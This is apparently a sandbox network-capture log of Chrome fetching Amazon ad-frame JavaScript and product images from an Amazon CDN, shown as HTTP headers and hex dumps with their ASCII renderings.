                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: a3 4a c8 5b 0d 0e 04 8a 48 d8 32 16 dd 4e f5 be 7b 25 67 fe bf be 6a 95 e2 b7 37 f6 b6 57 f7 b6 dd fd b2 4f 07 68 e7 46 c3 db fb f3 5b 9b 77 70 74 94 62 03 14 d5 83 5b d7 b7 97 d8 e2 4f c3 64 bf 7b 10 dc 37 bf 79 85 c8 9d 1c bc 9f 4a ee b6 13 a2 e8 d1 de 88 80 d0 09 d0 05 2e 15 30 4d 48 77 22 8e b8 c5 16 c9 ec 7d 9f 93 fd e3 41 d9 0b 2e 9a fe f9 aa 82 ea 7b bb 58 2c e4 17 77 17 69 1c d7 3d cd 9c 66 fe 07 95 5d a3 d2 12 eb df 95 e0 6d 5a 04 ba 91 d1 fa 04 2c 2f 9e 2b c3 de f1 51 12 77 84 ac 8a c5 93 f5 80 d9 91 b7 07 0c 0f 42 08 38 35 14 eb 55 82 c5 49 b1 ca d2 83 f8 11 c8 fa a7 68 3f 6f ef b5 45 fb 6b c0 20 b2 e1 57 12 a9 72 ca d0 e0 33 16 1b b8 5a 92 fd 5a 65 00 2d d4 a0 64 e4 77 92 b0 23 18 c6 f2 9f 9f 53 5c 4e d7 d9 7d 03 b3 f7 50 87 2f fa 58 8e a6 66
                                                                                                                                                                                                        Data Ascii: J[H2N{%gj7WOhF[wptb[Od{7yJ.0MHw"}A.{X,wi=f]mZ,/+QwB85UIh?oEk Wr3ZZe-dw#S\N}P/Xf
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1363INData Raw: 18 c3 0d b0 af 97 91 13 c8 3c 6a 54 f5 60 d5 62 31 73 94 63 e3 a1 5d cb 2a 6f fb 3b 97 9e d1 78 3d 99 ee c5 c1 b8 75 f7 bb 85 d6 80 8e 78 73 84 d8 f4 0c c6 a2 fd a6 ed d7 0b e2 bc 36 5b 78 e4 68 e5 67 88 84 91 34 06 01 c1 d9 b7 4f 91 20 d7 e6 78 a7 91 60 99 23 ce 42 8c 01 cf 00 8c 81 8c 1f 77 23 03 98 a4 b3 c8 60 81 24 ce a2 a7 20 f3 c6 49 00 e7 27 dd c6 c7 90 ab f5 78 05 2a b1 9d bc 9b d6 2f 52 b5 1e 39 3a 32 85 cc 52 6d 49 69 f2 2d 78 a5 68 5b f8 8a f3 2c a6 46 24 d4 7b b3 93 34 96 6a 18 e4 a3 c8 b9 f4 ce a5 1f 20 d8 f9 57 72 bc d2 ea ce 56 d7 15 6d e5 bc 5b 87 43 d3 ad ae a3 73 42 95 cc 56 19 92 9f 51 4a 52 ab 93 8a 52 94 d0 24 54 a5 2a 62 b0 a5 29 40 12 1e c9 0c f1 4b 3f 8b fe 46 ab 47 8a 70 f9 ee 67 d7 01 c1 50 99 ca 07 1f a3 75 99 39 bc 64 65 97 07
                                                                                                                                                                                                        Data Ascii: <jT`b1sc]*o;x=uxs6[xhg4O x`#Bw#`$ I'x*/R9:2RmIi-xh[,F${4j WrVm[CsBVQJRR$T*b)@K?FGpgPu9de


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        34192.168.2.449794151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC661OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1330INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 31002
                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                        X-Amz-IR-Id: 6dacb469-d1a7-4273-ad3c-a3e25de9c412
                                                                                                                                                                                                        Cache-Control: max-age=15552000,public
                                                                                                                                                                                                        Last-Modified: Thu, 08 Aug 2024 13:22:33 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                        Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:00 GMT
                                                                                                                                                                                                        Age: 191044
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100084-IAD, cache-ewr-kewr1740026-EWR
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 22 73 66 49 6d 70 72 65 73 73 69 6f 6e 22 2c 74 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 69 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 61 3d 28 65 2c 74 2c 69 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 69 7d 29 2c 73 3d 28 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 65 29 2c 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 74 29 2c 61 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 29 2c 72 3d 28 61 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 29 2c 6e 3d 28 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65
                                                                                                                                                                                                        Data Ascii: (()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 2e 70 61 79 6c 6f 61 64 2c 66 3d 76 6f 69 64 20 30 21 3d 3d 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 29 3f 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 3a 6e 75 6c 6c 2c 6e 75 6c 6c 3d 3d 3d 66 26 26 64 65 6c 65 74 65 20 43 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 7d 2c 49 3d 22 61 64 6c 6f 61 64 5f 72 65 6e 64 65 72 73 74 61 72 74 22 2c 53 3d 22 61 64 6c 6f 61 64 5f 72 65 6e 64 65 72 65 6e 64 22 2c 41 3d 22 69 6d 70 72 65 73 73 69 6f 6e 22 2c 5f 3d 22 76 69 65 77 61 62 69 6c 69 74 79 22 2c 4e 3d 22 75 6e 73 65 72 76 65 64 76 69 65 77 61 62 69 6c 69 74 79 22 2c 44 3d 22 61 64 6c 6f 61 64 3a 72 65
                                                                                                                                                                                                        Data Ascii: .payload,f=void 0!==(null==e?void 0:e.viewabilityStandards)?null==e?void 0:e.viewabilityStandards:null,null===f&&delete C.viewabilityStandards},I="adload_renderstart",S="adload_renderend",A="impression",_="viewability",N="unservedviewability",D="adload:re
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 74 68 69 73 2e 77 61 69 74 46 6f 72 4d 65 73 73 61 67 65 50 72 6f 63 65 73 73 65 64 3d 61 73 79 6e 63 20 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 74 68 69 73 2e 70 65 6e 64 69 6e 67 4d 65 73 73 61 67 65 73 2e 73 65 74 28 65 2c 74 29 29 29 2c 74 68 69 73 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 3d 65 3d 3e 7b 74 72 79 7b 63 6f 6e 73 74 20 69 3d 65 2e 64 61 74 61 2c 61 3d 69 2e 63 6f 6d 6d 61 6e 64 3f 69 2e 63 6f 6d 6d 61 6e 64 2e 73 70 6c 69 74 28 22 2e 22 29 3a 5b 5d 3b 6c 65 74 20 73 3d 74 68 69 73 2e 63 5b 61 5b 30 5d 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 31 3b 65 3c 61 2e 6c 65 6e 67 74 68 26 26 73 3b 65 2b 2b 29 73 3d 73 5b 61 5b 65 5d 5d 3b 69 66 28 22 63 75 73 74 6f 6d 4d 65 73 73 61 67 65 22 3d 3d 3d 69 2e 63 6f 6d 6d 61 6e 64 29
                                                                                                                                                                                                        Data Ascii: this.waitForMessageProcessed=async e=>new Promise((t=>this.pendingMessages.set(e,t))),this.receiveMessage=e=>{try{const i=e.data,a=i.command?i.command.split("."):[];let s=this.c[a[0]];for(let e=1;e<a.length&&s;e++)s=s[a[e]];if("customMessage"===i.command)
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 74 68 28 22 3b 22 29 2c 63 3d 6e 2e 73 74 61 72 74 73 57 69 74 68 28 22 25 22 29 26 26 6f 2e 73 74 61 72 74 73 57 69 74 68 28 22 25 22 29 26 26 22 25 33 44 22 3d 3d 3d 6c 3b 69 3d 64 3f 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 61 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2b 51 29 3a 63 3f 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 2b 51 29 3a 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 61 2b 51 29 7d 77 68 69 6c 65 28 73 26 26 72 3c 31 30 29 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 69 7d 3b 63 6f 6e 73 74 20 5a 3d 28 65 2c 74 2c 69 2c 61 29 3d 3e 7b 74 72 79 7b 74 2e 63 6f 75 6e 74 4d 65 74 72 69 63 28 44 2c 31 29 2c 74 2e 6c 6f 67 43
                                                                                                                                                                                                        Data Ascii: th(";"),c=n.startsWith("%")&&o.startsWith("%")&&"%3D"===l;i=d?i.replace(K,X+a.replace(/&/g,"&amp;")+Q):c?i.replace(K,X+encodeURIComponent(a)+Q):i.replace(K,X+a+Q)}while(s&&r<10)}catch(h){return t}return i};const Z=(e,t,i,a)=>{try{t.countMetric(D,1),t.logC
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 68 7d 60 29 7d 2c 6c 65 3d 61 73 79 6e 63 20 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 28 61 77 61 69 74 20 66 65 74 63 68 28 65 29 29 2e 74 65 78 74 28 29 3b 72 65 74 75 72 6e 20 64 65 28 74 29 7d 2c 64 65 3d 65 3d 3e 7b 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 65 29 2e 63 72 65 61 74 69 76 65 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 65 7d 7d 2c 63 65 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 22 53 45 52 56 45 52 5f 53 49 44 45 22 3d 3d 3d 65 2e 63 72 65 61 74 69 76 65 2e 66 6c 6f 77 29 72 65 74 75 72 6e 20 61 3d 65 2e 68 74 6d 6c 43 6f 6e 74 65 6e 74 45 6e 63 6f 64 65 64 2c 73 3d 65 2e 68 74 6d 6c 43 6f 6e 74 65 6e 74 45 6e 63 6f 64 65 64 4c 65 6e 67 74 68 2c 7b 67 65 74 41 64 3a 61 73 79 6e 63 28 29 3d 3e 28 7b 63
                                                                                                                                                                                                        Data Ascii: h}`)},le=async e=>{const t=await(await fetch(e)).text();return de(t)},de=e=>{try{return JSON.parse(e).creative}catch(t){return e}},ce=(e,t)=>{if("SERVER_SIDE"===e.creative.flow)return a=e.htmlContentEncoded,s=e.htmlContentEncodedLength,{getAd:async()=>({c
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 69 73 2e 6d 70 2e 6f 6e 6d 65 73 73 61 67 65 3d 74 68 69 73 2e 63 6d 72 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 2c 74 68 69 73 2e 63 2e 63 6f 75 6e 74 4d 65 74 72 69 63 28 22 61 64 6c 6f 61 64 3a 69 66 72 61 6d 65 69 6e 69 74 69 61 6c 69 7a 65 64 22 2c 31 29 2c 74 68 69 73 2e 63 2e 6c 6f 67 43 73 61 45 76 65 6e 74 28 22 61 64 6c 6f 61 64 5f 69 66 72 61 6d 65 69 6e 69 74 69 61 6c 69 7a 65 64 22 29 2c 6e 65 77 20 52 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 52 45 53 49 5a 45 5f 41 53 50 45 43 54 5f 52 41 54 49 4f 5f 39 30 39 32 32 36 22 29 2e 69 73 54 31 28 29 7c 7c 28 28 65 2c 74 29 3d 3e 7b 74 2e 64 69 73 61 62 6c 65 52 65 73 69 7a 65 46 75 6e 63 7c 7c 65 2e 73 65 6e 64 4d 65 73 73 61 67 65 28 22 72 65 73 69 7a 65 53 61 66 65 46 72 61 6d 65
                                                                                                                                                                                                        Data Ascii: is.mp.onmessage=this.cmr.receiveMessage,this.c.countMetric("adload:iframeinitialized",1),this.c.logCsaEvent("adload_iframeinitialized"),new R(window,"ADPT_SF_RESIZE_ASPECT_RATIO_909226").isT1()||((e,t)=>{t.disableResizeFunc||e.sendMessage("resizeSafeFrame
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 65 61 74 69 76 65 54 65 6d 70 6c 61 74 65 4e 61 6d 65 2c 61 73 79 6e 63 28 29 3d 3e 74 68 69 73 2e 6c 6f 61 64 41 64 28 74 29 29 3a 61 73 79 6e 63 28 29 3d 3e 7b 77 65 28 29 2c 74 68 69 73 2e 66 6f 72 63 65 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 45 78 70 65 72 69 65 6e 63 65 28 29 7d 3b 76 61 72 20 73 2c 72 2c 6e 7d 63 61 74 63 68 28 6f 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 2e 6c 6f 67 45 72 72 6f 72 28 22 43 6f 75 6c 64 6e 27 74 20 67 65 74 41 64 20 66 72 6f 6d 20 68 74 6d 6c 50 72 6f 76 69 64 65 72 22 2c 6f 29 2c 61 73 79 6e 63 28 29 3d 3e 7b 77 65 28 29 2c 74 68 69 73 2e 66 6f 72 63 65 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 45 78 70 65 72 69 65 6e 63 65 28 29 7d 7d 7d 2c 74 68 69 73 2e 65 6e 73 75 72 65 47 6c 6f 62 61 6c 73 3d 28 29 3d 3e
                                                                                                                                                                                                        Data Ascii: eativeTemplateName,async()=>this.loadAd(t)):async()=>{we(),this.forceRenderFallbackExperience()};var s,r,n}catch(o){return this.c.logError("Couldn't getAd from htmlProvider",o),async()=>{we(),this.forceRenderFallbackExperience()}}},this.ensureGlobals=()=>
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 62 61 63 6b 53 74 61 74 69 63 41 64 48 65 6c 70 65 72 28 29 2c 74 68 69 73 2e 65 6e 73 75 72 65 47 6c 6f 62 61 6c 73 28 29 2c 74 68 69 73 2e 6d 70 2e 6f 6e 6d 65 73 73 61 67 65 3d 74 68 69 73 2e 63 6d 72 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 7d 2c 74 68 69 73 2e 6c 6f 61 64 41 64 3d 61 73 79 6e 63 20 65 3d 3e 7b 74 68 69 73 2e 6f 2e 69 73 4e 6f 49 6e 76 65 6e 74 6f 72 79 3d 21 31 2c 66 65 28 74 68 69 73 2e 63 2c 74 68 69 73 2e 6f 2c 74 68 69 73 2e 63 6d 73 29 3b 6c 65 74 20 74 3d 59 28 74 68 69 73 2e 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 50 61 72 61 6d 2c 65 29 3b 74 68 69 73 2e 69 73 56 69 64 65 6f 28 29 3f 6e 65 77 20 52 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 41 44 53 50 5f 56 49 44 45 4f 5f 38 33 33 34 31 39 22 29 2e 69 73 54 31 28
                                                                                                                                                                                                        Data Ascii: backStaticAdHelper(),this.ensureGlobals(),this.mp.onmessage=this.cmr.receiveMessage},this.loadAd=async e=>{this.o.isNoInventory=!1,fe(this.c,this.o,this.cms);let t=Y(this.clickTrackingParam,e);this.isVideo()?new R(window,"ADPT_SF_ADSP_VIDEO_833419").isT1(
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 74 2e 6c 6f 67 45 72 72 6f 72 28 22 45 72 72 6f 72 20 61 70 70 65 6e 64 69 6e 67 20 62 6c 61 6e 6b 41 64 53 63 72 69 70 74 22 2c 69 29 7d 7d 2c 76 65 3d 65 3d 3e 21 21 28 22 74 72 75 65 22 21 3d 3d 65 2e 61 62 70 41 63 63 65 70 74 61 62 6c 65 26 26 65 2e 61 62 70 53 74 61 74 75 73 26 26 65 2e 65 6e 61 62 6c 65 46 61 6c 6c 62 61 63 6b 46 6f 72 41 62 70 53 74 61 74 75 73 65 73 26 26 65 2e 65 6e 61 62 6c 65 46 61 6c 6c 62 61 63 6b 46 6f 72 41 62 70 53 74 61 74 75 73 65 73 2e 69 6e 64 65 78 4f 66 28 6d 5b 65 2e 61 62 70 53 74 61 74 75 73 5d 29 3e 2d 31 29 2c 70 65 3d 61 73 79 6e 63 20 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 7b 6c 65 74 20 69 3d 2d 31 3b 63 6f 6e 73 74 20 61 3d 65 3d 3e 7b 63 6f 6e 73 74 20 61 3d 65 2e 64 61 74 61 2c 73 3d 22
                                                                                                                                                                                                        Data Ascii: t.logError("Error appending blankAdScript",i)}},ve=e=>!!("true"!==e.abpAcceptable&&e.abpStatus&&e.enableFallbackForAbpStatuses&&e.enableFallbackForAbpStatuses.indexOf(m[e.abpStatus])>-1),pe=async e=>new Promise((t=>{let i=-1;const a=e=>{const a=e.data,s="


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        35192.168.2.449793151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC696OUTGET /images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3939
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 4716c533-09ec-4263-944f-69c7c0012d21
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Fri, 01 Apr 2044 20:00:54 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 196901
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:00 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200120-IAD, cache-ewr-kewr1740062-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9a 00 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 06 07 01 05 03 04 08 02 10 00 02 01 03 03 01 06 04 04 02 09 05 00 00 00 00 01 02 03 00 04 11 05 12 21 31 06 13 22 41 51 71 07 61 81 91 14 32 72 b1 42 d1 25 33 52 62 82 92 a1 a2 b2
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"AQqa2rB%3Rb
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: 2a 00 cb fb 01 fc 5f a7 a9 ae 59 1a 75 79 11 da 5d a5 ec ce b8 da 95 98 d2 de 3d e3 ee 8a 12 4b d8 ee 80 ef c3 86 00 78 95 b7 2f 1c 67 63 71 9f 63 cd 71 84 b6 8b c7 de b3 fa 2a a9 8d 8f bb 1e 00 ae 09 a5 b7 ba 58 ae ed 14 ac 33 86 2a 87 ac 6c a7 6b a7 b0 3c a9 f3 04 7a 1a 93 69 9d 99 86 ee cb f1 d2 dc 94 40 1c b0 11 16 db b3 af 98 27 15 9b f2 57 ca f9 d3 b2 73 8f 76 69 bc ed 11 a2 17 6e d5 72 ec 46 e5 bb 69 17 bb 00 22 7f 61 78 07 dc f5 63 ef 5d 5a d9 6a 16 76 f6 db 0d bd d2 ce 1b c8 21 46 5f 7c d6 b6 95 b2 13 8c dc 67 c8 dd 52 84 a0 9c 16 cb f9 5f ef 71 4a 52 b9 9d 05 29 4a 00 52 94 a0 08 5d 66 be 6b 22 b4 83 46 69 4a 54 00 a5 2b 31 a9 97 3b 01 6c 7a 0d df b6 6a 36 06 d2 e4 ec 46 31 1c 8d ec 3e f8 ae 45 97 6e 07 21 54 1d d8 25 77 01 d5 7f c6 df bd 62 1b
                                                                                                                                                                                                        Data Ascii: *_Yuy]=Kx/gcqcq*X3*lk<zi@'WsvinrFi"axc]Zjv!F_|gR_qJR)JR]fk"FiJT+1;lzj6F1>En!T%wb
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1183INData Raw: 91 7f e2 d5 5d 55 3e a6 9f 9d b7 7f d9 97 7a 5b 5e 46 ad bf 74 29 4a 52 03 e2 94 a5 00 29 4a 50 04 2a 94 a5 69 46 85 29 4a 00 c3 ae f5 65 f5 06 bd 63 a3 6a 63 58 d3 2d 2e 87 25 e2 5d df 27 5f 0b fd 98 57 94 6a ea ec 17 e3 f4 dd 31 6e 20 8b f1 31 5c c9 21 ee 04 8b 1b c7 b0 f7 79 4d d8 56 df 8e 41 65 a6 31 a6 d4 da 28 b5 ec 78 4b 1e 16 bf 52 7d 2b f9 36 5a ec 7f 98 7a 86 fd ab c4 ff 00 08 13 3a fd 8f f7 22 b8 3f 64 22 bd b1 a8 6a c9 27 8a 5b 4b a8 bd 41 b6 69 3f d6 3e f0 55 1d d8 be c0 45 d9 dd 4f f1 c6 e6 49 b0 92 81 12 e9 b7 31 b0 ef 3e 65 48 e2 9e 32 87 a6 b4 18 fc 2b 51 9e dc de 2c b7 4b 02 1c f7 4b 83 ef d4 fd ab 98 76 92 78 a2 d9 63 61 72 ec 7f 8c c3 dc e3 db bc 31 81 ef 87 f6 ad 65 b5 85 fc e9 27 e2 6c 86 4b 78 41 60 02 e4 65 88 93 7a c8 79 e3 2c ab
                                                                                                                                                                                                        Data Ascii: ]U>z[^Ft)JR)JP*iF)JecjcX-.%]'_Wj1n 1\!yMVAe1(xKR}+6Zz:"?d"j'[KAi?>UEOI1>eH2+Q,KKvxcar1e'lKxA`ezy,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        36192.168.2.449798151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC704OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
